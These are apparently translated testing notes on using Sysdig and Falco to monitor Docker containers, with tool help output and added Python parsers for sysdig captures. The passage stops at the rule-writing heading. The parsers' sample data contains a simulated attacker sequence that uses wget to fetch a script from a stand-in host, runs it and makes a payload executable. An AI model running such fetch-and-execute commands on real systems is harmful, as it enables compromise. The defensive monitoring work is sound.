Sysdig/Falco Functional Testing

Test environment:
OS: Ubuntu 16.04 LTS installed on Xen 4.11
Docker version: 18.06.1-ce

Installing Sysdig/Falco

For installation on Linux, see:
https://github.com/falcosecurity/falco/wiki/How-to-Install-Falco-for-Linux
For installation as a container, see:
https://github.com/falcosecurity/falco/wiki/How-to-Install-Falco-using-Containers-and-or-Orchestration

Docker container setup

Mainly the network settings, so that the container can be reached from outside:

$ docker run -d -P training/webapp python app.py

$ docker container ls -l
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
... Up 2 seconds 0.0.0.0:49155->5000

Process tree retrieval test

A process tree shows the relationships between processes; on a normal Linux system the pstree command displays this information.

In this test we need to use sysdig to see the process tree inside the container:

  1. If the container already has the pstree package, run pstree through docker exec to obtain the process tree directly.
  2. If the container does not have pstree installed, the process information can only be viewed through sysdig. Sysdig can filter processes of various kinds, for example the process with the highest network usage, but it does not provide a whole-process-tree operation.
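Sysdig has no chisel that prints a whole process tree, but the exec events it captures carry pid, ppid and the container, which is enough to rebuild one offline. The Python script below is an added example, not part of the original post: it assumes the capture was taken with `sysdig -p "%container.name %proc.pid %proc.ppid %proc.name %proc.cmdline" "evt.type=execve and evt.dir=< and container.id!=host"`, rebuilds a pstree-like view per container from constructed sample lines, and shows parents that started before the capture as placeholders instead of dropping their children.

```python
import re
from collections import defaultdict

# Constructed sample capture for this example. Assumed command line:
#   sysdig -p "%container.name %proc.pid %proc.ppid %proc.name %proc.cmdline" \
#          "evt.type=execve and evt.dir=< and container.id!=host"
# i.e. one line per successful exec inside any container, host processes excluded.
SAMPLE = """\
webapp 3101 3087 python python app.py
webapp 3150 3101 sh sh -c wget -q http://example.invalid/sample.sh -O /tmp/sample.sh
webapp 3151 3150 wget wget -q http://example.invalid/sample.sh -O /tmp/sample.sh
webapp 3160 3101 sh sh /tmp/sample.sh
webapp 3161 3160 chmod chmod +x /tmp/payload.bin
db 4012 4001 mysqld mysqld --datadir=/var/lib/mysql
"""

# container pid ppid name, then the command line (which may contain spaces)
LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+(\S+)\s*(.*)$")


def parse_exec_events(text):
    """Yield (container, pid, ppid, name, cmdline) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            cont, pid, ppid, name, cmd = m.groups()
            yield cont, int(pid), int(ppid), name, cmd


def build_tree(text):
    """{container: {pid: (ppid, name, cmdline)}}; a pid that execs twice keeps
    its latest image, which is what pstree would show too."""
    procs = defaultdict(dict)
    for cont, pid, ppid, name, cmd in parse_exec_events(text):
        procs[cont][pid] = (ppid, name, cmd)
    return procs


def render_tree(procs):
    """pstree-like lines for one container. Parents never seen in the capture
    (e.g. the entrypoint, started before sysdig) become a placeholder root."""
    children = defaultdict(list)
    for pid, (ppid, _, _) in procs.items():
        children[ppid].append(pid)
    out = []

    def walk(pid, depth):
        if pid in procs:
            _, name, cmd = procs[pid]
            out.append(("  " * depth + f"{name}({pid}) {cmd}").rstrip())
        else:
            out.append("  " * depth + f"?({pid}) [not captured]")
        for child in sorted(children.get(pid, [])):
            walk(child, depth + 1)

    for root in sorted({ppid for ppid, _, _ in procs.values() if ppid not in procs}):
        walk(root, 0)
    return out
```

Run it against a real capture by replacing SAMPLE with the saved sysdig output; each container is rendered separately with `render_tree(build_tree(text)[name])`.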

File operation test

File operation monitoring is mainly about watching for newly added files: during an attack, the attacker often downloads files onto the system, and those files are exactly the sample files we want.

In this test we need to use sysdig to see the file operations inside the container. The options for this requirement are:

  1. Use falco to monitor all activity in the container and filter out the relevant operations.

Network packets

For network packets, all network traffic needs to be dumped.

In this test we need to use sysdig to filter the traffic so that all network operations are visible. To see the packet contents:

  • View as binary (hex + ASCII)

    sysdig -s2000 -X -c echo_fds

  • View as ASCII

    sysdig -s2000 -A -c echo_fds
    

Samples

Samples are the files uploaded by the attacker.

In this test, to cover this item with sysdig we have the following options:

  1. Monitor the system's file operations; if a download occurs, treat the file as suspicious and watch it.
  2. Analyze the content of the network traffic and watch the parts where a file is downloaded.

History information

History information refers to the record of shell commands.

In this test, falco lets us record the shell command history, together with the user who ran each command and similar details.

Sysdig output format

%evt.num %evt.outputtime %evt.cpu %proc.name (%thread.tid) %evt.dir %evt.type %evt.info
  • evt.num: incremental event number
  • evt.outputtime: event timestamp (customizable)
  • evt.cpu: number of the CPU where the event was captured
  • proc.name: name of the process that generated the event
  • thread.tid: TID that generated the event, which equals the PID for single-threaded processes
  • evt.dir: event direction (> enter event, < exit event)
  • evt.type: event name, e.g. 'open', 'read', 'write'
  • evt.info: list of event arguments
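As an added example (not from the original post), the Python parser below splits the default-format lines described above into their fields and applies them to the file-operation test from earlier: it lists the files that open/openat/creat exit events may have created, skipping failed calls. The sample lines are constructed; the capture they mimic would be `sysdig "evt.type in (open, openat, creat)"` in the default format, so there are no container columns, and the key=value(annotation) rendering of evt.info follows sysdig's style.

```python
import re

# Constructed sample in sysdig's default output format:
#   %evt.num %evt.outputtime %evt.cpu %proc.name (%thread.tid) %evt.dir %evt.type %evt.info
# Values are made up; the argument rendering mimics sysdig's key=value(annotation) style.
SAMPLE = """\
5321 10:44:05.123456789 0 bash (2104) > open
5322 10:44:05.123501234 0 bash (2104) < open fd=3(<f>/tmp/sample.sh) name=/tmp/sample.sh flags=70(O_TRUNC|O_CREAT|O_WRONLY) mode=0644
5323 10:44:05.124000000 1 python (3101) < openat fd=7(<f>/app/templates/index.html) dirfd=-100(AT_FDCWD) name=/app/templates/index.html flags=1(O_RDONLY) mode=0
5324 10:44:05.125000000 1 python (3101) < read fd=7(<f>/app/templates/index.html) size=8192
5325 10:44:06.000000000 0 wget (3151) < openat fd=4(<f>/tmp/payload.bin) dirfd=-100(AT_FDCWD) name=/tmp/payload.bin flags=70(O_TRUNC|O_CREAT|O_WRONLY) mode=0644
5326 10:44:06.200000000 0 bash (2104) < open fd=-13(EACCES) name=/root/.profile flags=70(O_TRUNC|O_CREAT|O_WRONLY) mode=0644
"""

LINE_RE = re.compile(
    r"^(?P<num>\d+)\s+(?P<time>\S+)\s+(?P<cpu>\d+)\s+(?P<proc>.+?)\s+"
    r"\((?P<tid>\d+)\)\s+(?P<dir>[<>])\s+(?P<type>\S+)\s*(?P<info>.*)$")
# key=value pairs; a value runs until the next " key=" so "3(<f>/tmp/x)" stays whole
ARG_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Split one default-format line into its fields; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    for key in ("num", "cpu", "tid"):
        ev[key] = int(ev[key])
    return ev


def parse_info(info):
    """Turn evt.info into a dict. Free-text values such as data= on read/write
    may contain '=' and be split wrongly; that does not affect open() events."""
    return dict(ARG_RE.findall(info))


def created_files(lines):
    """[(proc, tid, path)] for successful open/openat/creat exits that may have
    created the file. Failed calls (negative fd) are skipped. O_CREAT on an
    existing path overwrites rather than creates, which is still worth flagging
    when hunting for dropped samples."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if not ev or ev["dir"] != "<" or ev["type"] not in ("open", "openat", "creat"):
            continue
        args = parse_info(ev["info"])
        if args.get("fd", "-1").startswith("-"):
            continue
        if ev["type"] == "creat" or "O_CREAT" in args.get("flags", ""):
            hits.append((ev["proc"], ev["tid"], args.get("name")))
    return hits
```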

Appendix (detailed Sysdig + Falco usage, translated from the help output)

$ sysdig -h
sysdig version 0.24.1
Usage: sysdig [options] [-p <output_format>] [filter]

Options:
 -A, --print-ascii
    Only print the text portion of data buffers, and echo end-of-lines. This is
    useful to only display human-readable data.
 -b, --print-base64
    Print data buffers in base64. This is useful for encoding binary data that
    needs to be used over media designed to handle textual data (i.e., terminal
    or json).
 -B<bpf_probe>, --bpf=<bpf_probe>
    Enable live capture using the specified BPF probe instead of the kernel
    module. The BPF probe can also be specified via the environment variable
    SYSDIG_BPF_PROBE. If <bpf_probe> is left empty, sysdig will try to load one
    from the sysdig-probe-loader script.
 -c <chiselname> <chiselargs>, --chisel <chiselname> <chiselargs>
    Run the specified chisel. If the chisel requires arguments, they must be
    specified in the command line after the name.
 -cl, --list-chisels
    Lists the available chisels. Looks for chisels in ./chisels, ~/.chisels and
    /usr/share/sysdig/chisels.
 -C <file_size>, --file-size=<file_size>
    Before writing an event, check whether the file is currently larger than
    file_size and, if so, close the current file and open a new one. Saved files
    will have the name specified with the -w flag, with a number after it,
    starting at 0 and continuing upward. The units of file_size are millions of
    bytes (10^6, not 2^20). Use the -W flag to determine how many files will be
    saved to disk.
 -d, --displayflt
    Make the given filter a display one. Setting this option causes the events
    to be filtered after being parsed by the state system. Events are normally
    filtered before being analyzed, which is more efficient, but can cause state
    (e.g. FD names) to be lost.
 -D, --debug
    Capture events about sysdig itself, display internal events in addition to
    system events, and print additional logging on standard error.
 -E, --exclude-users
    Don't create the user/group tables by querying the OS when sysdig starts.
    This also means that no user or group info will be written to the trace file
    by the -w flag. The user/group tables are necessary to use filter fields
    like user.name or group.name. However, creating them can increase sysdig's
    startup time. Moreover, they contain information that could be privacy
    sensitive.
 -e <num_events>
    If used together with -w option, creates a series of dump files containing
    only a specified number of events given in num_events parameter each. Used
    alongside -W flags creates a ring buffer of file containing num_events each.
 -F, --fatfile
    Enable fatfile mode. When writing in fatfile mode, the output file will
    contain events that will be invisible when reading the file, but that are
    necessary to fully reconstruct the state. Fatfile mode is useful when saving
    events to disk with an aggressive filter. The filter could drop events that
    would cause the state to be updated (e.g. clone() or open()). With fatfile
    mode, those events are still saved to file, but 'hidden' so that they won't
    appear when reading the file. Be aware that using this flag might generate
    substantially bigger trace files.
 --filter-proclist
    Apply the filter to the process table. A full dump of /proc is typically
    included in any trace file to make sure all the state required to decode
    events is in the file. This could cause the file to contain unwanted or
    sensitive information. Using this flag causes the command line filter to be
    applied to the /proc dump as well.
 -G <num_seconds>, --seconds=<num_seconds>
    Rotates the dump file specified with the -w option every num_seconds
    seconds. Saved files will have the name specified by -w which should include
    a time format as defined by strftime(3). If no time format is specified, a
    counter will be used. If no data format is specified, this can be used with
    -W flag to create a ring buffer of events.
 -h, --help
    Print this page
 -i <chiselname>, --chisel-info <chiselname>
    Get a longer description and the arguments associated with a chisel found in
    the -cl option list.
 -j, --json
    Emit output as json, data buffer encoding will depend from the print format
    selected.
 -k <url>, --k8s-api=<url>
    Enable Kubernetes support by connecting to the API server specified as
    argument. E.g. "http://admin:password@127.0.0.1:8080". The API server can
    also be specified via the environment variable SYSDIG_K8S_API.
 -K <bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>], --k8s-api-cert=<bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>]
    Use the provided files names to authenticate user and (optionally) verify
    the K8S API server identity. Each entry must specify full (absolute, or
    relative to the current directory) path to the respective file. Private key
    password is optional (needed only if key is password protected). CA
    certificate is optional. For all files, only PEM file format is supported.
    Specifying CA certificate only is obsoleted - when single entry is provided
    for this option, it will be interpreted as the name of a file containing
    bearer token. Note that the format of this command-line option prohibits use
    of files whose names contain ':' or '#' characters in the file name. Option
    can also be provided via the environment variable SYSDIG_K8S_API_CERT.
 -L, --list-events
    List the events that the engine supports
 -l, --list
    List the fields that can be used for filtering and output formatting. Use
    -lv to get additional information for each field.
 --list-markdown
    Like -l, but produces markdown output
 -m <url[,marathon_url]>, --mesos-api=<url[,marathon_url]>
    Enable Mesos support by connecting to the API server specified as argument.
    E.g. "http://admin:password@127.0.0.1:5050". Marathon url is optional and
    defaults to Mesos address, port 8080. The API servers can also be specified
    via the environment variable SYSDIG_MESOS_API.
 -M <num_seconds>
    Stop collecting after <num_seconds> reached.
 -n <num>, --numevents=<num>
    Stop capturing after <num> events
 --page-faults
    Capture user/kernel major/minor page faults
 -P, --progress
    Print progress on stderr while processing trace files
 -p <output_format>, --print=<output_format>
    Specify the format to be used when printing the events. With -pc or
    -pcontainer will use a container-friendly format. With -pk or -pkubernetes
    will use a kubernetes-friendly format. With -pm or -pmesos will use a
    mesos-friendly format. See the examples section below for more info.
 -q, --quiet
    Don't print events on the screen. Useful when dumping to disk.
 -R
    Resolve port numbers to names.
 -r <readfile>, --read=<readfile>
    Read the events from <readfile>.
 -S, --summary
    Print the event summary (i.e. the list of the top events) when the capture
    ends.
 -s <len>, --snaplen=<len>
    Capture the first <len> bytes of each I/O buffer. By default, the first 80
    bytes are captured. Use this option with caution, it can generate huge trace
    files.
 -t <timetype>, --timetype=<timetype>
    Change the way event time is displayed. Accepted values are h for
    human-readable string, a for absolute timestamp from epoch, r for relative
    time from the beginning of the capture, d for delta between event enter and
    exit, and D for delta from the previous event.
 -T, --force-tracers-capture
    Tell the driver to make sure full buffers are captured from /dev/null, to
    make sure that tracers are completely captured. Note that sysdig will enable
    extended /dev/null capture by itself after detecting that tracers are
    written there, but that could result in the truncation of some tracers at
    the beginning of the capture. This option allows preventing that.
 --unbuffered
    Turn off output buffering. This causes every single line emitted by sysdig
    to be flushed, which generates higher CPU usage but is useful when piping
    sysdig's output into another process or into a script.
 -U, --suppress-comm
    Ignore all events from processes having the provided comm.
 -v, --verbose
    Verbose output. This flag will cause the full content of text and binary
    buffers to be printed on screen, instead of being truncated to 40
    characters. Note that data buffers length is still limited by the snaplen
    (refer to the -s flag documentation). -v will also make sysdig print some
    summary information at the end of the capture.
 --version
    Print version number.
 -w <writefile>, --write=<writefile>
    Write the captured events to <writefile>.
 -W <num>, --limit <num>
    Used in conjunction with the -C option, this will limit the number of files
    created to the specified number, and begin overwriting files from the
    beginning, thus creating a 'rotating' buffer. Used in conjunction with the
    -G option, this will limit the number of rotated dump files that get
    created, exiting with status 0 when reaching the limit. If used with -C as
    well, the behavior will result in cyclical files per timeslice.
 -x, --print-hex
    Print data buffers in hex.
 -X, --print-hex-ascii
    Print data buffers in hex and ASCII.
 -z, --compress
    Used with -w, enables compression for trace files.

Output format:

By default, sysdig prints the information for each captured event on a single
line with the following format:

%evt.num %evt.outputtime %evt.cpu %proc.name (%thread.tid) %evt.dir %evt.type %evt.info

where:
 evt.num is the incremental event number
 evt.time is the event timestamp
 evt.cpu is the CPU number where the event was captured
 proc.name is the name of the process that generated the event
 thread.tid is the TID that generated the event, which corresponds to the
   PID for single thread processes
 evt.dir is the event direction, > for enter events and < for exit events
 evt.type is the name of the event, e.g. 'open' or 'read'
 evt.info is the list of event arguments.

The output format can be customized with the -p switch, using any of the
fields listed by 'sysdig -l'.

Using -pc or -pcontainer, the default format will be changed to a container-friendly one:

%evt.num %evt.outputtime %evt.cpu %container.name (%container.id) %proc.name (%thread.tid:%thread.vtid) %evt.dir %evt.type %evt.info

Using -pk or -pkubernetes, the default format will be changed to a kubernetes-friendly one:

%evt.num %evt.outputtime %evt.cpu %k8s.pod.name (%container.id) %proc.name (%thread.tid:%thread.vtid) %evt.dir %evt.type %evt.info

Using -pm or -pmesos, the default format will be changed to a mesos-friendly one:

%evt.num %evt.outputtime %evt.cpu %mesos.task.name (%container.id) %proc.name (%thread.tid:%thread.vtid) %evt.dir %evt.type %evt.info

Examples:

Capture all the events from the live system and print them to screen
$ sysdig

Capture all the events from the live system and save them to disk
$ sysdig -w dumpfile.scap

Read events from a file and print them to screen
$ sysdig -r dumpfile.scap

Print all the open system calls invoked by cat
$ sysdig proc.name=cat and evt.type=open

Print the name of the files opened by cat
$ sysdig -p"%evt.arg.name" proc.name=cat and evt.type=open

Falco usage

$ falco -h
falco version 0.12.1
Usage: falco [options]

Options:
 -h, --help
    Print this page
 -c
    Configuration file (default /mnt/workspace/falco-build-stable/label/builder-agent-64/falco/falco.yaml, /etc/falco/falco.yaml)
 -A
    Monitor all events, including those with EF_DROP_FALCO flag.
 -d, --daemon
    Run as a daemon
 -D <pattern>
    Disable any rules matching the regex <pattern>. Can be specified multiple
    times. Can not be specified with -t.
 -e <events_file>
    Read the events from <events_file> (in .scap format) instead of tapping into
    live.
 -k <url>, --k8s-api=<url>
    Enable Kubernetes support by connecting to the API server specified as
    argument. E.g. "http://admin:password@127.0.0.1:8080". The API server can
    also be specified via the environment variable FALCO_K8S_API.
 -K <bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>], --k8s-api-cert=<bt_file> | <cert_file>:<key_file[#password]>[:<ca_cert_file>]
    Use the provided files names to authenticate user and (optionally) verify
    the K8S API server identity. Each entry must specify full (absolute, or
    relative to the current directory) path to the respective file. Private key
    password is optional (needed only if key is password protected). CA
    certificate is optional. For all files, only PEM file format is supported.
    Specifying CA certificate only is obsoleted - when single entry is provided
    for this option, it will be interpreted as the name of a file containing
    bearer token. Note that the format of this command-line option prohibits use
    of files whose names contain ':' or '#' characters in the file name.
 -L
    Show the name and description of all rules and exit.
 -l <rule>
    Show the name and description of the rule with name <rule> and exit.
 -m <url[,marathon_url]>, --mesos-api=<url[,marathon_url]>
    Enable Mesos support by connecting to the API server specified as argument.
    E.g. "http://admin:password@127.0.0.1:5050". Marathon url is optional and
    defaults to Mesos address, port 8080. The API servers can also be specified
    via the environment variable FALCO_MESOS_API.
 -M <num_seconds>
    Stop collecting after <num_seconds> reached.
 -o, --option <key>=<val>
    Set the value of option <key> to <val>. Overrides values in configuration
    file. <key> can be a two-part <key>.<subkey>
 -p <output_format>, --print=<output_format>
    Add additional information to each falco notification's output. With -pc or
    -pcontainer will use a container-friendly format. With -pk or -pkubernetes
    will use a kubernetes-friendly format. With -pm or -pmesos will use a
    mesos-friendly format. Additionally, specifying -pc/-pk/-pm will change the
    interpretation of %container.info in rule output fields. See the examples
    section below for more info.
 -P, --pidfile <pid_file>
    When run as a daemon, write pid to specified file
 -r <rules_file>
    Rules file/directory (defaults to value set in configuration file, or
    /etc/falco_rules.yaml). Can be specified multiple times to read from
    multiple files/directories.
 -s <stats_file>
    If specified, write statistics related to falco's reading/processing of
    events to this file. (Only useful in live mode).
 -T <tag>
    Disable any rules with a tag=<tag>. Can be specified multiple times. Can not
    be specified with -t.
 -t <tag>
    Only run those rules with a tag=<tag>. Can be specified multiple times. Can
    not be specified with -T/-D.
 -U, --unbuffered
    Turn off output buffering to configured outputs. This causes every single
    line emitted by falco to be flushed, which generates higher CPU usage but is
    useful when piping those outputs into another process or into a script.
 -V, --validate <rules_file>
    Read the contents of the specified rules(s) file and exit. Can be specified
    multiple times to validate multiple files.
 -v
    Verbose output.
 --version
    Print version number.

Writing Falco rules

Falco natively supports containers and provides monitoring of network, process, file and other activity; the specific monitoring behaviour is defined by writing your own rules.

The most important part of falco is its rules file: falco needs this rules file to implement the various kinds of monitoring.

Falco rule-writing notes: